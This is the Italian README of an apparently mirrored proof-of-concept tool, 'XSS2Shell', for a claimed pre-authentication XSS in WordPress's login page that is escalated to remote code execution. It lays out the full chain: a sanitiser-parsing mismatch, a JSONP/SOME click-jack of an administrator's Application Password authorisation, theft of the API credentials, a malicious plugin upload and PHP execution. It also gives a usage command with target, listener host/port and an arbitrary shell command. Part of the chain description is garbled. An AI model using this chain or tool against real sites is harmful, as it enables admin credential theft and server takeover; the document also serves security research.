
XSS2Shell (CVE-2026-64638) mirror PoC di XSS pre-auth a RCE in WordPress — WordSec, MIT; per test di sicurezza autorizzati
Mirror di distribuzione HackSpeak. Questo repository è un mirror distributivo del PoC didattico XSS2Shell (CVE-2026-64638) pubblicato da WordSec, con codice identico all'upstream; l'upstream è MIT License, Copyright (c) 2026 WordSec.
⚠️ Esclusivamente per ricerca sulla sicurezza e test autorizzati: eseguire solo su siti WordPress di propria proprietà o con autorizzazione scritta di valutazione; il PoC genera e pulisce artefatti di pubblicazione temporanei, non utilizzarlo contro amministratori terzi o sistemi di produzione.
XSS2Shell (CVE-2026-64638) è una XSS riflessa pre-autenticazione nella pagina di login di WordPress (wp-login.php), che può essere elevata, tramite una catena completa, a esecuzione di codice PHP lato server (RCE).
strip_tags() di PHP e KSES di WordPress (wp_kses_post()) — inserendo uno spazio tra < e il nome del tag (es. ), la prima lo conserva come testo normale, mentre la seconda lo interpreta come elemento HTML valido (// sono tutti nella whitelist);< area<area><div><button>ajaxurl → user-profile.js incluso nella pagina di login innesca automaticamente una POST jQuery → REST API JSONP (_jsonp) → Same Origin Method Execution (SOME, Paulos Yibelo 2022) → click cross-window sul pulsante di autorizzazione Application Password dell'amministratore → furto delle credenziali API → pubblicazione di una pagina contenente <script> → upload di un plugin ZIP dannoso → esecuzione diretta di PHP (senza attivazione);python3 xss2shell_poc.py -t http://wordpress.test --lhost 192.168.1.100 --lport 8080 -c "whoami"
| Parametro | Descrizione |
|---|---|
-t, --target | URL di base di WordPress (include http/https, normalizzazione automatica dello slash finale) |
-c, --command | Comando da eseguire quando la shell è pronta |
--lhost / --lport | Indirizzo/porta di ascolto (lport 0 = casuale) |
--keep | Conserva la pagina di pubblicazione temporanea (default: pulizia) |
Dipendenze: Python 3.7+, zero pacchetti di terze parti; richiede che un amministratore acceda al sito target e apra l'URL dell'attaccante (una singola interazione).